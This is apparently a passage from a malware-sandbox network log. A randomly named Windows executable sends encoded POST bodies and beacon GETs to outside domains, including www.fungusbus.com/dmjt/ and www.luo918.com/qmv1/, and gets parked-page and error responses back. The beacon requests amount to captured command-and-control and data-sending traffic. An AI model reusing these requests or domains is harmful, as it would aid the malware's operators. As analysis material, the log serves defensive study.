iJiX_=22K3e1HjhIYNXGSi+j+EueQPqpx3Pq9Fj7z3divNt9LN4gFrH5Wl+BmudD8WcVMCDt23tKmU8nTv+k2t1NW6Z9qUDNOrtRrYuJNWXokDu7aFccOT/oTOsBlYXaSIsyCsA5wPVOW+YFbRXLAsPHPDpVdc5zlEWDGbD0UAYG6in0Ize6s3ulLhi6GrnWRAEgtq6DUZ5iflHDeLMv9RdaCg8pDxlkXfv7U8RBC0yEcgZi1Vfmcr8i8Abk6OooGwhE0K+uHjzpmy5Mo9sY250wv+WNQvZWxhKZbh8egogZ12OWKI5gTHZecUqYpXSWzIQdVPvfLGHYcIUv2Fds+I8t7woyi9miSBOPDA/0Ab2RsMgoEHqej8/qIBrP1cutyzVTn+qX6EfXwU6XRGi6HG2KTaylohIG6ZOoMEsjzIkBEYKFzz6j/rBapnBgoMga9qvrdc2LO8gA/G1EbNUIG1mSkEgXOxeKZpK+FqkorZjVKYcksPLnBRKVJrOj/R+zjO+mMElmNIMWZ739RrkIi0ueE0jTlqBkupFPWXZUeo817MBvr6KxB1vqydTPYq58kyNtpaXafXYR/3bkLEo0+CN36ULhn5SkJmo9bBzmcOrx8DsR+kD+ra+6ol/Q4rK6GPAzBa8onyHkV+/NOdlzNhy/p4meSgzxveI9Y7RTD3ar7S2p43zlEMSPdbPQcT0iUfoX3mUl75/WbJYGpqWpPCIoqSvqPukV56ES/0B8gwA2X4wr53wN3iXT/aY7FwxjVFHGE0lMwVJLAsaGP3aJ7BN8VVK8PQcz14Tonsw6f5RQugyux2aUAyQRKAZ+sA8gmo7A62joZFFOLo7daT5Hx2hdstMyGcRNFUG1+CvAbclCX7tENJdR0U8DDifS4m0qOVoUdA6AXfVb0ZFNohtfzIdWbCsFRjBZzwnFKs4mSc56vnJHDkA3u0cx+KUPI5+Z0+VKK+UlrZksQp9pkk+NgtgtHt2Ls0IjOIO8sg4zdGaPJXcpBurF [TRUNCATED]
Jul 3, 2024 08:36:10.029144049 CEST	176	IN	HTTP/1.1 405 Method Not Allowed Server: nginx/1.20.2 Date: Wed, 03 Jul 2024 06:36:09 GMT Content-Type: text/html Content-Length: 157 Via: 1.1 google Connection: close
Jul 3, 2024 08:36:10.030770063 CEST	157	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.8	61457	35.227.248.111	80	6880	C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 08:36:11.915971994 CEST	477	OUT	GET /qmv1/?eZ=3HYLM&iJiX_=70iXdBj3vvgYA1qv9X+C2v5f15BZXYNXgOSbaBLZsvX+/zBEWaSfpSSmWx4BVFALB6Pvk4Cj2RW76gyU8dG7duzMF8qcwSy0or9MU4FAt6yJL5XTwcCyhmcdeorymiKmWQ== HTTP/1.1 Host: www.luo918.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Jul 3, 2024 08:36:12.570111990 CEST	300	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Wed, 03 Jul 2024 06:36:12 GMT Content-Type: text/html Content-Length: 5161 Last-Modified: Mon, 15 Jan 2024 02:08:28 GMT Vary: Accept-Encoding ETag: "65a4939c-1429" Cache-Control: no-cache Accept-Ranges: bytes Via: 1.1 google Connection: close
Jul 3, 2024 08:36:12.576738119 CEST	1236	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true
Jul 3, 2024 08:36:12.576778889 CEST	1236	IN	Data Raw: 77 20 49 6d 61 67 65 29 2e 73 72 63 3d 6e 7d 66 75 6e 63 74 69 6f 6e 20 72 65 70 6f 72 74 4c 6f 61 64 69 6e 67 28 6e 29 7b 6e 3d 6e 7c 7c 7b 7d 3b 76 61 72 20 6f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 6e 3d 28 77 69 6e 64 6f Data Ascii: w Image).src=n}function reportLoading(n){n=n\|\|{};var o=function(){for(var n=(window.location.search.substr(1)\|\|"").split("&"),o={},e=0;e<n.length;e++){var r=n[e].split("=");o[r[0]]=r[1]}return function(){return o}}();function e(){var n=window.
Jul 3, 2024 08:36:12.576788902 CEST	1236	IN	Data Raw: 74 72 3d 64 73 66 72 70 66 76 65 64 6e 63 70 73 73 6e 74 6e 77 62 69 70 72 65 69 6d 65 75 74 73 76 22 29 3b 28 65 28 29 7c 7c 72 28 29 29 26 26 22 61 6e 64 72 6f 69 64 22 3d 3d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 77 69 6e 64 6f Data Ascii: tr=dsfrpfvedncpssntnwbipreimeutsv");(e()\|\|r())&&"android"===function(){var n=window.navigator.userAgent.toLowerCase();return window.ucweb?"android":n.match(/ios/i)\|\|n.match(/ipad/i)\|\|n.match(/iphone/i)?"iphone":n.match(/android/i)\|\|n.match(/ap
Jul 3, 2024 08:36:12.576841116 CEST	1236	IN	Data Raw: 28 22 73 72 63 22 2c 22 2f 2f 69 6d 61 67 65 2e 75 63 2e 63 6e 2f 73 2f 75 61 65 2f 67 2f 30 31 2f 77 65 6c 66 61 72 65 61 67 65 6e 63 79 2f 76 63 6f 6e 73 6f 6c 65 2e 6d 69 6e 2d 33 2e 33 2e 30 2e 6a 73 22 29 2c 24 68 65 61 64 2e 69 6e 73 65 72 Data Ascii: ("src","//image.uc.cn/s/uae/g/01/welfareagency/vconsole.min-3.3.0.js"),$head.insertBefore($script1,$head.lastChild),$script1.onload=function(){var e=document.createElement("script");e.setAttribute("crossorigin","anonymous"),e.setAttribute("src
Jul 3, 2024 08:36:12.576850891 CEST	217	IN	Data Raw: e6 b2 a1 e6 9c 89 e5 b9 bf e5 91 8a 3c 2f 64 69 76 3e 3c 64 69 76 3e e7 94 b5 e5 bd b1 e6 92 ad e6 94 be e4 b8 8d e5 8d a1 e9 a1 bf 3c 2f 64 69 76 3e 3c 64 69 76 3e e7 b2 be e5 bd a9 e8 a7 86 e9 a2 91 e5 ad 98 e5 85 a5 e7 bd 91 e7 9b 98 e9 9a 8f Data Ascii: </div><div></div><div></div></div><script src="https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js"></script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.8	61458	91.195.240.19	80	6880	C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 08:36:17.634121895 CEST	746	OUT	POST /dmjt/ HTTP/1.1 Host: www.fungusbus.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Cache-Control: max-age=0 Content-Length: 206 Content-Type: application/x-www-form-urlencoded Origin: http://www.fungusbus.com Referer: http://www.fungusbus.com/dmjt/ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 69 4a 69 58 5f 3d 6b 6a 62 4b 76 56 48 4f 2f 4f 75 46 53 6a 6c 4c 50 79 58 2b 50 30 4c 7a 69 69 2f 38 57 78 4a 6e 4a 4f 79 2f 52 6d 6a 58 51 72 47 41 4d 32 63 4d 35 6b 4f 69 4b 39 54 65 37 61 78 39 7a 78 7a 70 37 51 37 35 46 6c 61 71 5a 44 35 52 30 71 71 75 6c 4e 53 35 4f 73 4d 2f 65 69 4d 69 44 6e 54 74 37 59 4e 54 73 39 62 6d 37 33 45 67 36 33 48 34 31 4a 52 41 55 48 51 5a 53 75 76 72 50 72 72 71 70 74 2f 4c 50 77 58 76 6f 66 4d 4d 6c 58 4f 36 66 36 37 74 52 6f 66 64 64 34 50 52 6b 4e 47 4a 4b 53 54 69 6c 59 78 34 72 6b 61 42 38 6d 78 34 50 78 4d 32 56 75 5a 72 66 38 36 52 39 52 48 68 4f 43 48 70 69 58 41 3d Data Ascii: iJiX_=kjbKvVHO/OuFSjlLPyX+P0Lzii/8WxJnJOy/RmjXQrGAM2cM5kOiK9Te7ax9zxzp7Q75FlaqZD5R0qqulNS5OsM/eiMiDnTt7YNTs9bm73Eg63H41JRAUHQZSuvrPrrqpt/LPwXvofMMlXO6f67tRofdd4PRkNGJKSTilYx4rkaB8mx4PxM2VuZrf86R9RHhOCHpiXA=
Jul 3, 2024 08:36:18.287039042 CEST	305	IN	HTTP/1.1 405 Not Allowed date: Wed, 03 Jul 2024 06:36:18 GMT content-type: text/html content-length: 154 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.8	61459	91.195.240.19	80	6880	C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 08:36:20.164222956 CEST	766	OUT	POST /dmjt/ HTTP/1.1 Host: www.fungusbus.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Cache-Control: max-age=0 Content-Length: 226 Content-Type: application/x-www-form-urlencoded Origin: http://www.fungusbus.com Referer: http://www.fungusbus.com/dmjt/ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 69 4a 69 58 5f 3d 6b 6a 62 4b 76 56 48 4f 2f 4f 75 46 54 47 74 4c 4e 54 58 2b 4a 55 4c 30 75 43 2f 38 64 52 4a 6a 4a 4f 2b 2f 52 6a 44 48 51 65 75 41 4d 54 67 4d 34 68 69 69 47 64 54 65 77 36 78 34 2b 52 7a 75 37 51 33 4c 46 67 69 71 5a 44 39 52 30 6f 79 75 6c 38 53 6d 50 38 4d 39 59 69 4d 67 4e 48 54 74 37 59 4e 54 73 39 65 42 37 30 30 67 36 6d 33 34 30 72 70 44 4b 58 51 61 43 2b 76 72 59 62 71 74 70 74 2f 69 50 78 4c 56 6f 61 51 4d 6c 56 6d 36 63 72 37 75 4b 59 66 62 54 59 50 48 67 64 66 2f 49 77 6d 42 6f 4c 70 63 31 6c 75 59 30 77 63 53 56 54 45 77 57 75 78 41 66 2f 53 6e 34 6d 61 4a 55 68 58 5a 38 41 56 69 69 75 37 57 41 54 6c 6e 61 79 2b 53 66 6c 32 46 79 35 42 4b Data Ascii: iJiX_=kjbKvVHO/OuFTGtLNTX+JUL0uC/8dRJjJO+/RjDHQeuAMTgM4hiiGdTew6x4+Rzu7Q3LFgiqZD9R0oyul8SmP8M9YiMgNHTt7YNTs9eB700g6m340rpDKXQaC+vrYbqtpt/iPxLVoaQMlVm6cr7uKYfbTYPHgdf/IwmBoLpc1luY0wcSVTEwWuxAf/Sn4maJUhXZ8AViiu7WATlnay+Sfl2Fy5BK
Jul 3, 2024 08:36:20.806572914 CEST	305	IN	HTTP/1.1 405 Not Allowed date: Wed, 03 Jul 2024 06:36:20 GMT content-type: text/html content-length: 154 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.8	61460	91.195.240.19	80	6880	C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 08:36:22.703391075 CEST	1783	OUT	POST /dmjt/ HTTP/1.1 Host: www.fungusbus.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Cache-Control: max-age=0 Content-Length: 1242 Content-Type: application/x-www-form-urlencoded Origin: http://www.fungusbus.com Referer: http://www.fungusbus.com/dmjt/ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 69 4a 69 58 5f 3d 6b 6a 62 4b 76 56 48 4f 2f 4f 75 46 54 47 74 4c 4e 54 58 2b 4a 55 4c 30 75 43 2f 38 64 52 4a 6a 4a 4f 2b 2f 52 6a 44 48 51 65 32 41 4e 6c 55 4d 35 43 36 69 48 64 54 65 35 61 78 35 2b 52 79 72 37 51 65 43 46 68 65 63 5a 42 31 52 75 4c 36 75 68 34 2b 6d 46 38 4d 39 55 43 4d 6a 44 6e 54 34 37 59 39 58 73 2b 32 42 37 30 30 67 36 6b 2f 34 67 4a 52 44 49 58 51 5a 53 75 76 5a 50 72 71 4a 70 70 54 59 50 78 4f 33 6f 75 63 4d 6b 31 57 36 50 70 54 75 58 6f 66 5a 65 34 4f 45 67 64 6a 73 49 77 72 79 6f 49 31 69 31 69 61 59 6e 56 68 64 43 6a 46 6f 4a 75 78 54 53 4e 61 4e 78 47 32 62 4b 79 72 31 33 51 5a 51 6d 34 2f 48 57 44 68 39 52 68 72 4a 41 6b 36 2b 78 35 30 51 6d 50 2b 46 32 6e 58 6e 75 56 5a 69 46 6e 48 6c 4f 2b 34 61 41 2b 38 66 58 34 76 73 55 65 66 67 48 41 78 46 6e 37 65 46 53 2b 74 39 5a 7a 49 4c 75 61 75 68 42 4f 49 34 43 78 37 44 64 45 67 6b 4a 6e 45 4c 61 6a 61 76 65 32 6b 53 54 4a 64 58 68 70 61 4e 53 76 77 54 65 6d 56 59 5a 65 45 55 30 74 44 6f 63 53 54 4b 6c 30 74 44 73 67 37 4c [TRUNCATED] Data Ascii: iJiX_=kjbKvVHO/OuFTGtLNTX+JUL0uC/8dRJjJO+/RjDHQe2ANlUM5C6iHdTe5ax5+Ryr7QeCFhecZB1RuL6uh4+mF8M9UCMjDnT47Y9Xs+2B700g6k/4gJRDIXQZSuvZPrqJppTYPxO3oucMk1W6PpTuXofZe4OEgdjsIwryoI1i1iaYnVhdCjFoJuxTSNaNxG2bKyr13QZQm4/HWDh9RhrJAk6+x50QmP+F2nXnuVZiFnHlO+4aA+8fX4vsUefgHAxFn7eFS+t9ZzILuauhBOI4Cx7DdEgkJnELajave2kSTJdXhpaNSvwTemVYZeEU0tDocSTKl0tDsg7LdGPkGjSLRgJ91QxeBdsbnBjkq+c7eoGdmm9s7eNlbDe5tpXmrMoVJS5x3/vZlQuE8MPZcCR44Qe0GG8sghegFgJnz6fxKnQyPZNDSxFoxl2sHcAsHQaY6RaQF+hpX28T3NnLcODLMR1WwfL89By1QCcP7xg3ZPpY/Qd77Qb8HWd95ljgEzlfjWcfm48IX8St6st7A9BGgUa65EhgeZntulafINRjL/UB1p6NArKAVXUTeb0uluFWbLE34E0PAzPQpHbNcpzWWqXdV9Gg0Kk198bthoh3+2HEGH1S4vQBmXG7c8tX8zZs/25znCzRu5cg7bd2WpLk0OnjMeqSMbXwoNMxApS9FxHtY9OIXZcKM3TE6cqJC8J7IozfF7ZBwQzg5DMIcA5N/3BitcjXzhz1ipKfLkgNmft+Y7PyiJcazJH4CN45+kLcPoHXoX7akOhjveBTLxksVkVzJMXzvHJZdmLM3iN6wlcwyz9InrrHpfE8M+DPd+0CK22N3snknjdEaX/roGe2O2gbsw2gURz220JyOOHAKEWRuIqnEEZKo7WsaYxyldEUGxLoLQcolugO5qyzzO2TMztDSctRsXIDkgtu7tpsjqFeucv7C8jeHdZ6UD0KN5EFL9qJunvVhHCErlBzac5rNkoN2sOXigiPiJzG6Ia7bohJay [TRUNCATED]
Jul 3, 2024 08:36:23.343283892 CEST	305	IN	HTTP/1.1 405 Not Allowed date: Wed, 03 Jul 2024 06:36:23 GMT content-type: text/html content-length: 154 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.8	61461	91.195.240.19	80	6880	C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 08:36:25.248488903 CEST	480	OUT	GET /dmjt/?iJiX_=phzqshWM8++lNTZcZDn6PlPBsxjNAhN5IKmoEk/tfOScWWQLgCWtTff73plV+RjstliAOCijSwUPjuCIutjnEtY8cBV1InP23K1rvoSk7X1+smLn8qttMRFZOf+8GJ/nwg==&eZ=3HYLM HTTP/1.1 Host: www.fungusbus.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Jul 3, 2024 08:36:25.942310095 CEST	1236	IN	HTTP/1.1 200 OK date: Wed, 03 Jul 2024 06:36:25 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked vary: Accept-Encoding expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_2aFormlKIxr0FAAy2RnV7rdMONss7Tnvmket7TpesLBXV/SHJxsn21niBBhT9BEKid0bWl+2MQgvoKz3cLOJ+Q== last-modified: Wed, 03 Jul 2024 06:36:25 GMT x-cache-miss-from: parking-89c5695ff-gj6gm server: Parking/1.0 connection: close Data Raw: 32 45 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 32 61 46 6f 72 6d 6c 4b 49 78 72 30 46 41 41 79 32 52 6e 56 37 72 64 4d 4f 4e 73 73 37 54 6e 76 6d 6b 65 74 37 54 70 65 73 4c 42 58 56 2f 53 48 4a 78 73 6e 32 31 6e 69 42 42 68 54 39 42 45 4b 69 64 30 62 57 6c 2b 32 4d 51 67 76 6f 4b 7a 33 63 4c 4f 4a 2b 51 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 66 75 6e 67 75 73 62 75 73 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 66 75 6e 67 75 73 [TRUNCATED] Data Ascii: 2E3<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_2aFormlKIxr0FAAy2RnV7rdMONss7Tnvmket7TpesLBXV/SHJxsn21niBBhT9BEKid0bWl+2MQgvoKz3cLOJ+Q==><head><meta charset="utf-8"><title>fungusbus.com - fungusbus Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="fungusbus.com is your first and best source for all of the information you
Jul 3, 2024 08:36:25.942334890 CEST	1236	IN	Data Raw: 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 Data Ascii: re looking for. From general topics to more of what you would expect to find here, fungusbus.com has it all. We hope you find what you are searching for!"1062><link rel="icon" type="image/png" href="//img.sedopark
Jul 3, 2024 08:36:25.942354918 CEST	448	IN	Data Raw: 29 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 68 65 69 67 68 74 3a 30 7d 69 6d 67 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 73 76 67 3a 6e 6f 74 28 3a 72 6f 6f 74 29 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 62 75 74 74 6f Data Ascii: ){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}
Jul 3, 2024 08:36:25.942367077 CEST	1236	IN	Data Raw: 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 7d 62 75 74 74 6f 6e 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 72 69 6e 67 2c 5b 74 79 70 65 3d 62 75 74 74 6f 6e 5d 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 72 69 6e 67 2c 5b 74 79 70 65 3d 72 65 73 Data Ascii: -style:none;padding:0}button:-moz-focusring,[type=button]:-moz-focusring,[type=reset]:-moz-focusring,[type=submit]:-moz-focusring{outline:1px dotted ButtonText}fieldset{padding:.35em .75em .625em}legend{box-sizing:border-box;color:inherit;disp
Jul 3, 2024 08:36:25.942378998 CEST	1236	IN	Data Raw: 75 79 62 6f 78 5f 5f 63 6f 6e 74 65 6e 74 2d 68 65 61 64 69 6e 67 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 62 75 79 62 6f 78 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 Data Ascii: uybox__content-heading{font-size:15px}.container-buybox__content-text{font-size:12px}.container-buybox__content-link{color:#949494}.container-buybox__content-link--no-decoration{text-decoration:none}.container-searchbox{margin-bottom:50px;text
Jul 3, 2024 08:36:25.942449093 CEST	1236	IN	Data Raw: 72 69 76 61 63 79 50 6f 6c 69 63 79 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 70 72 69 76 61 63 79 50 6f 6c 69 63 79 5f 5f 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c Data Ascii: rivacyPolicy{text-align:center}.container-privacyPolicy__content{display:inline-block}.container-privacyPolicy__content-link{font-size:10px;color:#949494}.container-cookie-message{position:fixed;bottom:10620;width:100%;background:#5f5f5f;f
Jul 3, 2024 08:36:25.942460060 CEST	1236	IN	Data Raw: 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 78 2d 77 69 64 74 68 3a 35 35 30 70 78 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 65 6d 7d 2e Data Ascii: nline-block;max-width:550px}.cookie-modal-window__content-text{line-height:1.5em}.cookie-modal-window__close{width:100%;margin:0}.cookie-modal-window__content-body table{width:100%;border-collapse:collapse}.cookie-modal-window__content-body ta
Jul 3, 2024 08:36:25.942471027 CEST	1236	IN	Data Raw: 72 3a 23 37 32 37 63 38 33 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 37 32 37 63 38 33 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 69 74 69 61 6c 7d 2e 73 77 69 74 63 68 20 69 6e 70 75 74 7b 6f 70 61 63 69 74 79 3a Data Ascii: r:#727c83;border-color:#727c83;color:#fff;font-size:initial}.switch input{opacity:0;width:0;height:0}.switch{position:relative;display:inline-block;width:60px;height:34px}.switch__slider{position:absolute;cursor:pointer;top:0;left:0;right:0;bo
Jul 3, 2024 08:36:25.942481995 CEST	1236	IN	Data Raw: 72 2d 63 6f 6e 74 65 6e 74 5f 5f 77 65 62 61 72 63 68 69 76 65 7b 77 69 64 74 68 3a 33 30 25 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 63 6f 6e 74 61 69 6e 65 72 Data Ascii: r-content__webarchive{width:30%;display:inline-block}.container-content__container-relatedlinks{margin-top:147px;flex-grow:1;width:300px}.container-content__container-ads{margin-top:8.5%}.container-content__container-ads--twot{margin-top:2.5%;
